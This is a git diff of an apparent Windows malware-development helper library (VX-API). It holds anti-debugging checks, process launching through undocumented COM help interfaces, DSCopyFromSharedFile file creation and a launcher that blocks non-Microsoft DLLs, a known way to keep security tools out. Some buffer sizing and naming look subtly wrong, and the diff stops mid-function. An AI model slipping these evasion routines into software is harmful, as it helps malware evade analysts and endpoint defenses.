} TEB, * PTEB;
|
|
@ -1,5 +0,0 @@
|
|||
typedef struct _TEB_ACTIVE_FRAME {
|
||||
ULONG Flags;
|
||||
struct _TEB_ACTIVE_FRAME* Previous;
|
||||
PTEB_ACTIVE_FRAME_CONTEXT Context;
|
||||
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
|
|
@ -1,4 +0,0 @@
|
|||
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
|
||||
ULONG Flags;
|
||||
PCHAR FrameName;
|
||||
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
|
|
@ -1,5 +0,0 @@
|
|||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
PWSTR Buffer;
|
||||
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING;
|
|
@ -0,0 +1,31 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 17
|
||||
VisualStudioVersion = 17.3.32811.315
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "VX-API", "VX-API\VX-API.vcxproj", "{12CF8029-1663-470E-B138-39DC69C35B1D}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x64.Build.0 = Debug|x64
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x86.Build.0 = Debug|Win32
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x64.ActiveCfg = Release|x64
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x64.Build.0 = Release|x64
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.ActiveCfg = Release|Win32
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {1F480641-9B52-43C6-8598-B49F6B203C27}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,19 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL AdfCloseHandleOnInvalidAddress(VOID)
|
||||
{
|
||||
__try
|
||||
{
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4312)
|
||||
CloseHandle((HANDLE)0xDEADBEEF);
|
||||
#pragma warning( pop )
|
||||
return FALSE;
|
||||
}
|
||||
__except (EXCEPTION_INVALID_HANDLE == GetExceptionCode() ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
|
||||
{
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
|
@ -0,0 +1,19 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL AdfIsCreateProcessDebugEventCodeSet(VOID)
|
||||
{
|
||||
WCHAR FilePath[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
if (GetProcessPathFromProcessParametersW((MAX_PATH * sizeof(WCHAR)), FilePath) == 0)
|
||||
return FALSE;
|
||||
|
||||
hHandle = CreateFileW(FilePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
return TRUE;
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return FALSE;
|
||||
}
|
|
@ -1,10 +1,4 @@
|
|||
/*
|
||||
Some debuggers can be detected by using the kernel32!OpenProcess() function on the csrss.exe process.
|
||||
The call will succeed only if the user for the process is a member of the administrators group and
|
||||
has debug privileges.
|
||||
|
||||
Credit: Checkpoint Research
|
||||
*/
|
||||
#include "Win32Helper.h"
|
||||
|
||||
BOOL AdfOpenProcessOnCsrss(VOID)
|
||||
{
|
||||
|
@ -13,11 +7,11 @@ BOOL AdfOpenProcessOnCsrss(VOID)
|
|||
CSRGETPROCESSID CsrGetProcessId = NULL;
|
||||
HANDLE hCsrHandle = NULL;
|
||||
|
||||
hNtdll = RfGetModuleHandleW(L"ntdll.dll");
|
||||
hNtdll = GetModuleHandleExW(L"ntdll.dll");
|
||||
if (hNtdll == NULL)
|
||||
return FALSE;
|
||||
|
||||
CsrGetProcessId = (CSRGETPROCESSID)RfGetProcAddressA((DWORD64)hNtdll, "CsrGetProcessId");
|
||||
CsrGetProcessId = (CSRGETPROCESSID)GetProcAddressA((DWORD64)hNtdll, "CsrGetProcessId");
|
||||
if (CsrGetProcessId == NULL)
|
||||
return FALSE;
|
||||
|
||||
|
@ -29,4 +23,4 @@ BOOL AdfOpenProcessOnCsrss(VOID)
|
|||
CloseHandle(hCsrHandle);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
PCHAR CaplockStringA(PCHAR Ptr)
|
||||
{
|
||||
PCHAR sv = Ptr;
|
||||
|
@ -22,4 +24,4 @@ PWCHAR CaplockStringW(PWCHAR Ptr)
|
|||
sv++;
|
||||
}
|
||||
return Ptr;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
VOID CharArrayToByteArrayA(PCHAR Char, PBYTE Byte, DWORD Length)
|
||||
{
|
||||
for (DWORD dwX = 0; dwX < Length; dwX++)
|
||||
|
@ -12,4 +14,4 @@ VOID CharArrayToByteArrayW(PWCHAR Char, PBYTE Byte, DWORD Length)
|
|||
{
|
||||
Byte[dwX] = (BYTE)Char[dwX];
|
||||
}
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed)
|
||||
{
|
||||
INT Length = (INT)MaximumAllowed;
|
||||
|
@ -9,4 +11,4 @@ SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumA
|
|||
}
|
||||
|
||||
return MaximumAllowed - Length;
|
||||
}
|
||||
}
|
|
@ -1,10 +1,6 @@
|
|||
/*
|
||||
#include "Win32Helper.h"
|
||||
|
||||
Created via ReactOS and IDA
|
||||
|
||||
Credit: smelly__vx
|
||||
*/
|
||||
BOOL RfCheckRemoteDebuggerPresent(HANDLE hHandle, PBOOL pbDebuggerPresent)
|
||||
BOOL CheckRemoteDebuggerPresentEx(HANDLE hHandle, PBOOL pbDebuggerPresent)
|
||||
{
|
||||
typedef enum _PROCESSINFOCLASS
|
||||
{
|
||||
|
@ -24,11 +20,11 @@ BOOL RfCheckRemoteDebuggerPresent(HANDLE hHandle, PBOOL pbDebuggerPresent)
|
|||
if (hHandle == NULL)
|
||||
return FALSE;
|
||||
|
||||
HMODULE hModule = RfGetModuleHandleW(L"ntdll.dll");
|
||||
HMODULE hModule = GetModuleHandleExW(L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
return FALSE;
|
||||
|
||||
NtQueryInformationProcess = (NTQUERYINFORMATIONPROCESS)RfGetProcAddressW((DWORD64)hModule, L"NtQueryInformationProcess");
|
||||
NtQueryInformationProcess = (NTQUERYINFORMATIONPROCESS)GetProcAddressW((DWORD64)hModule, L"NtQueryInformationProcess");
|
||||
if (!NtQueryInformationProcess)
|
||||
return FALSE;
|
||||
|
||||
|
@ -39,4 +35,4 @@ BOOL RfCheckRemoteDebuggerPresent(HANDLE hHandle, PBOOL pbDebuggerPresent)
|
|||
*pbDebuggerPresent = TRUE;
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -1,10 +1,12 @@
|
|||
PVOID RfCopyMemory(PVOID Destination, CONST PVOID Source, SIZE_T Length)
|
||||
{
|
||||
PBYTE D = (PBYTE)Destination;
|
||||
PBYTE S = (PBYTE)Source;
|
||||
|
||||
while (Length--)
|
||||
*D++ = *S++;
|
||||
|
||||
return Destination;
|
||||
}
|
||||
#include "StringManipulation.h"
|
||||
|
||||
PVOID CopyMemoryEx(PVOID Destination, CONST PVOID Source, SIZE_T Length)
|
||||
{
|
||||
PBYTE D = (PBYTE)Destination;
|
||||
PBYTE S = (PBYTE)Source;
|
||||
|
||||
while (Length--)
|
||||
*D++ = *S++;
|
||||
|
||||
return Destination;
|
||||
}
|
|
@ -1,9 +1,5 @@
|
|||
/*
|
||||
FileToClone can be a path to any file. The file does not matter, but it must exist
|
||||
NewFileName is the file you want to create. It can named anything and in any dir you have permissions to create a file in
|
||||
#include "Win32Helper.h"
|
||||
|
||||
Credit: Jonas Lyk
|
||||
*/
|
||||
BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
|
||||
{
|
||||
typedef struct __DATA_SHARE_SCOPE_ENTRY {
|
||||
|
@ -25,7 +21,7 @@ BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
|
|||
typedef HRESULT(WINAPI* DSCREATESHAREDFILETOKEN)(LPCWSTR, PDATA_SHARE_CTRL, INT, INT, WCHAR**);
|
||||
typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
|
||||
|
||||
DATA_SHARE_CTRL Share; RfZeroMemory(&Share, sizeof(DATA_SHARE_CTRL));
|
||||
DATA_SHARE_CTRL Share; ZeroMemoryEx(&Share, sizeof(DATA_SHARE_CTRL));
|
||||
LPWSTR SidString = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
DSCREATESHAREDFILETOKEN DsCreateSharedFileToken = NULL;
|
||||
|
@ -39,8 +35,8 @@ BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
|
|||
if (hDsClient == NULL)
|
||||
return FALSE;
|
||||
|
||||
DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)RfGetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
|
||||
DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)RfGetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
|
||||
DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)GetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
|
||||
DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)GetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
|
||||
|
||||
if (!DsCreateSharedFileToken || !DsCopyFromSharedFile)
|
||||
goto EXIT_ROUTINE;
|
||||
|
@ -66,10 +62,10 @@ BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
|
||||
if (SidString)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, SidString);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, SidString);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
@ -98,7 +94,7 @@ BOOL CreateFileFromDsCopyFromSharedFileA(PCHAR NewFileName, PCHAR FileToClone)
|
|||
typedef HRESULT(WINAPI* DSCREATESHAREDFILETOKEN)(LPCWSTR, PDATA_SHARE_CTRL, INT, INT, WCHAR**);
|
||||
typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
|
||||
|
||||
DATA_SHARE_CTRL Share; RfZeroMemory(&Share, sizeof(DATA_SHARE_CTRL));
|
||||
DATA_SHARE_CTRL Share; ZeroMemoryEx(&Share, sizeof(DATA_SHARE_CTRL));
|
||||
LPWSTR SidString = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
DSCREATESHAREDFILETOKEN DsCreateSharedFileToken = NULL;
|
||||
|
@ -121,8 +117,8 @@ BOOL CreateFileFromDsCopyFromSharedFileA(PCHAR NewFileName, PCHAR FileToClone)
|
|||
if (hDsClient == NULL)
|
||||
return FALSE;
|
||||
|
||||
DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)RfGetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
|
||||
DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)RfGetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
|
||||
DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)GetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
|
||||
DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)GetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
|
||||
|
||||
if (!DsCreateSharedFileToken || !DsCopyFromSharedFile)
|
||||
goto EXIT_ROUTINE;
|
||||
|
@ -148,13 +144,13 @@ BOOL CreateFileFromDsCopyFromSharedFileA(PCHAR NewFileName, PCHAR FileToClone)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
|
||||
if (SidString)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, SidString);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, SidString);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
}
|
|
@ -1,16 +1,11 @@
|
|||
/*
|
||||
#include "Win32Helper.h"
|
||||
|
||||
pBuffer == OUT
|
||||
Path == concatted, must have \\ in front i.e. L"\\File.exe"
|
||||
|
||||
Credit: smelly__vx
|
||||
*/
|
||||
BOOL CreateLocalAppDataObjectPathW(PWCHAR pBuffer, PWCHAR Path, DWORD Size, BOOL bDoesObjectExist)
|
||||
{
|
||||
if (pBuffer == NULL)
|
||||
return FALSE;
|
||||
|
||||
if (RfGetEnvironmentVariableW(L"LOCALAPPDATA", pBuffer, Size) == 0)
|
||||
if (GetEnvironmentVariableW(L"LOCALAPPDATA", pBuffer, Size) == 0)
|
||||
return FALSE;
|
||||
|
||||
if (StringConcatW(pBuffer, Path) == 0)
|
||||
|
@ -30,7 +25,7 @@ BOOL CreateLocalAppDataObjectPathA(PCHAR pBuffer, PCHAR Path, DWORD Size, BOOL b
|
|||
if (pBuffer == NULL)
|
||||
return FALSE;
|
||||
|
||||
if (RfGetEnvironmentVariableA("LOCALAPPDATA", pBuffer, Size) == 0)
|
||||
if (GetEnvironmentVariableA("LOCALAPPDATA", pBuffer, Size) == 0)
|
||||
return FALSE;
|
||||
|
||||
if (StringConcatA(pBuffer, Path) == 0)
|
|
@ -0,0 +1,94 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
struct __declspec(uuid("{8cec592c-07a1-11d9-b15e-000d56bfe6ee}"))
|
||||
IHxHelpPaneServer : public IUnknown {
|
||||
virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0;
|
||||
virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0;
|
||||
virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0;
|
||||
virtual HRESULT __stdcall Execute(const PWCHAR) = 0;
|
||||
};
|
||||
|
||||
HRESULT CoInitializeIHxHelpIds(LPGUID Clsid, LPGUID Iid)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58ae-07a1-11d9-b15e-000d56bfe6ee}", Clsid)))
|
||||
return Result;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec592c-07a1-11d9-b15e-000d56bfe6ee}", Iid)))
|
||||
return Result;
|
||||
|
||||
return Result;
|
||||
}
|
||||
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerW(PWCHAR UriFile)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
GUID CLSID_IHxHelpPaneServer;
|
||||
GUID IID_IHxHelpPaneServer;
|
||||
|
||||
IHxHelpPaneServer* Help = NULL;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeIHxHelpIds(&CLSID_IHxHelpPaneServer, &IID_IHxHelpPaneServer)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(CoCreateInstance(CLSID_IHxHelpPaneServer, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (PVOID*)&Help)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
Result = Help->Execute(UriFile);
|
||||
|
||||
if (Help)
|
||||
Help->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return Win32FromHResult(Result);
|
||||
}
|
||||
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerA(PCHAR UriFile)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
GUID CLSID_IHxHelpPaneServer;
|
||||
GUID IID_IHxHelpPaneServer;
|
||||
IHxHelpPaneServer* Help = NULL;
|
||||
PWCHAR wUriFile = NULL;
|
||||
DWORD dwLength = 0;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeIHxHelpIds(&CLSID_IHxHelpPaneServer, &IID_IHxHelpPaneServer)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(CoCreateInstance(CLSID_IHxHelpPaneServer, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (PVOID*)&Help)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
dwLength = (DWORD)StringLengthA(UriFile);
|
||||
if (dwLength == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
wUriFile = (PWCHAR)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwLength);
|
||||
if (wUriFile == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CharStringToWCharString(wUriFile, UriFile, dwLength) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Help->Execute(wUriFile);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (Help)
|
||||
Help->Release();
|
||||
|
||||
if (wUriFile)
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, wUriFile);
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
}
|
|
@ -0,0 +1,89 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
struct __declspec(uuid("8cec595b-07a1-11d9-b15e-000d56bfe6ee"))
|
||||
IHxInteractiveUser : public IUnknown {
|
||||
virtual VOID __stdcall Execute(PWCHAR pcUrl) = 0;
|
||||
};
|
||||
|
||||
HRESULT CoInitializeIHxInteractiveUserIds(LPGUID Clsid, LPGUID Iid)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58e7-07a1-11d9-b15e-000d56bfe6ee}", Clsid)))
|
||||
return Result;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec595b-07a1-11d9-b15e-000d56bfe6ee}", Iid)))
|
||||
return Result;
|
||||
|
||||
return Result;
|
||||
}
|
||||
|
||||
HRESULT CreateProcessFromIHxInteractiveUserW(PWCHAR UriFile)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
GUID CLSID_IHxInteractiveUser;
|
||||
GUID IID_IHxInteractiveUser;
|
||||
IHxInteractiveUser* User = NULL;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeIHxInteractiveUserIds(&CLSID_IHxInteractiveUser, &IID_IHxInteractiveUser)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoCreateInstance(CLSID_IHxInteractiveUser, NULL, CLSCTX_ALL, IID_IHxInteractiveUser, (PVOID*)&User)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
User->Execute(UriFile);
|
||||
|
||||
if (User)
|
||||
User->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return Win32FromHResult(Result);
|
||||
}
|
||||
|
||||
HRESULT CreateProcessFromIHxInteractiveUserA(PCHAR UriFile)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
GUID CLSID_IHxInteractiveUser;
|
||||
GUID IID_IHxInteractiveUser;
|
||||
IHxInteractiveUser* User = NULL;
|
||||
PWCHAR wUriFile = NULL;
|
||||
DWORD dwLength = 0;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeIHxInteractiveUserIds(&CLSID_IHxInteractiveUser, &IID_IHxInteractiveUser)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoCreateInstance(CLSID_IHxInteractiveUser, NULL, CLSCTX_ALL, IID_IHxInteractiveUser, (PVOID*)&User)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
dwLength = (DWORD)StringLengthA(UriFile);
|
||||
if (dwLength == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
wUriFile = (PWCHAR)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwLength);
|
||||
if(wUriFile == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CharStringToWCharString(wUriFile, UriFile, dwLength + 1) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
User->Execute(wUriFile);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (User)
|
||||
User->Release();
|
||||
|
||||
if (wUriFile)
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, wUriFile);
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return Win32FromHResult(Result);
|
||||
}
|
|
@ -1,10 +1,4 @@
|
|||
/*
|
||||
must pass pointer of PPROCESS_INFORMATION to function, callee is responsible for closing handles
|
||||
eg
|
||||
|
||||
CloseHandle(PihProcess);
|
||||
CloseHandle(Pi.hThread);
|
||||
*/
|
||||
#include "Win32Helper.h"
|
||||
|
||||
typedef struct _PROC_THREAD_ATTRIBUTE {
|
||||
ULONG64 Attribute;
|
||||
|
@ -28,7 +22,7 @@ BOOL UnusedSubroutineInitializeProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_L
|
|||
|
||||
if (dwFlags || (dwAttributeCount > 0x1B))
|
||||
{
|
||||
SetLastError(ERROR_INVALID_PARAMETER);
|
||||
SetLastErrorEx(ERROR_INVALID_PARAMETER);
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
|
@ -43,7 +37,7 @@ BOOL UnusedSubroutineInitializeProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_L
|
|||
bFlag = TRUE;
|
||||
}
|
||||
else
|
||||
SetLastError(ERROR_INSUFFICIENT_BUFFER);
|
||||
SetLastErrorEx(ERROR_INSUFFICIENT_BUFFER);
|
||||
|
||||
*lpSize = dwSize;
|
||||
return bFlag;
|
||||
|
@ -55,7 +49,7 @@ DWORD UnusedSubroutineGetProcThreadAttributeListSize(VOID)
|
|||
|
||||
UnusedSubroutineInitializeProcThreadAttributeList(NULL, 1, 0, &dwSize);
|
||||
|
||||
return dwSize;
|
||||
return (DWORD)dwSize;
|
||||
}
|
||||
|
||||
VOID UnusedSubroutineUpdateProcThreadAttribute(LPPROC_THREAD_ATTRIBUTE_LIST AttributeList, DWORD_PTR Attribute, PVOID Policy, SIZE_T Size)
|
||||
|
@ -80,23 +74,23 @@ BOOL CreateProcessWithCfGuardW(PPROCESS_INFORMATION Pi, PWCHAR Path)
|
|||
SIZE_T dwAttributeSize = 0;
|
||||
DWORD64 Policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
|
||||
|
||||
STARTUPINFOEXW Si; RfZeroMemory(&Si, sizeof(STARTUPINFOEXW));
|
||||
STARTUPINFOEXW Si; ZeroMemoryEx(&Si, sizeof(STARTUPINFOEXW));
|
||||
Si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
|
||||
RfZeroMemory(Pi, sizeof(PROCESS_INFORMATION));
|
||||
ZeroMemoryEx(Pi, sizeof(PROCESS_INFORMATION));
|
||||
|
||||
dwAttributeSize = UnusedSubroutineGetProcThreadAttributeListSize();
|
||||
if (dwAttributeSize == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwAttributeSize);
|
||||
ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwAttributeSize);
|
||||
if (ThreadAttributes == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if(!UnusedSubroutineInitializeProcThreadAttributeList(ThreadAttributes, 1, 0, &dwAttributeSize))
|
||||
if (!UnusedSubroutineInitializeProcThreadAttributeList(ThreadAttributes, 1, 0, &dwAttributeSize))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
UnusedSubroutineUpdateProcThreadAttribute(ThreadAttributes, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &Policy, sizeof(DWORD64));
|
||||
|
||||
|
||||
Si.lpAttributeList = ThreadAttributes;
|
||||
|
||||
if (!CreateProcessW(Path, NULL, NULL, NULL, TRUE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &Si.StartupInfo, Pi))
|
||||
|
@ -109,7 +103,7 @@ BOOL CreateProcessWithCfGuardW(PPROCESS_INFORMATION Pi, PWCHAR Path)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (ThreadAttributes)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
@ -121,15 +115,15 @@ BOOL CreateProcessWithCfGuardA(PPROCESS_INFORMATION Pi, PCHAR Path)
|
|||
SIZE_T dwAttributeSize = 0;
|
||||
DWORD64 Policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
|
||||
|
||||
STARTUPINFOEXA Si; RfZeroMemory(&Si, sizeof(STARTUPINFOEXA));
|
||||
STARTUPINFOEXA Si; ZeroMemoryEx(&Si, sizeof(STARTUPINFOEXA));
|
||||
Si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
|
||||
RfZeroMemory(Pi, sizeof(PROCESS_INFORMATION));
|
||||
ZeroMemoryEx(Pi, sizeof(PROCESS_INFORMATION));
|
||||
|
||||
dwAttributeSize = UnusedSubroutineGetProcThreadAttributeListSize();
|
||||
if (dwAttributeSize == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwAttributeSize);
|
||||
ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwAttributeSize);
|
||||
if (ThreadAttributes == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -150,7 +144,7 @@ BOOL CreateProcessWithCfGuardA(PPROCESS_INFORMATION Pi, PCHAR Path)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (ThreadAttributes)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
}
|
|
@ -1,11 +1,11 @@
|
|||
ULONG Next = 2; //seed
|
||||
#include "Win32Helper.h"
|
||||
|
||||
INT PseudoRandomIntegerSubroutine(PULONG Context)
|
||||
{
|
||||
return ((*Context = *Context * 1103515245 + 12345) % ((ULONG)RAND_MAX + 1));
|
||||
}
|
||||
|
||||
INT CreatePseudoRandomInteger(VOID)
|
||||
INT CreatePseudoRandomInteger(ULONG Seed)
|
||||
{
|
||||
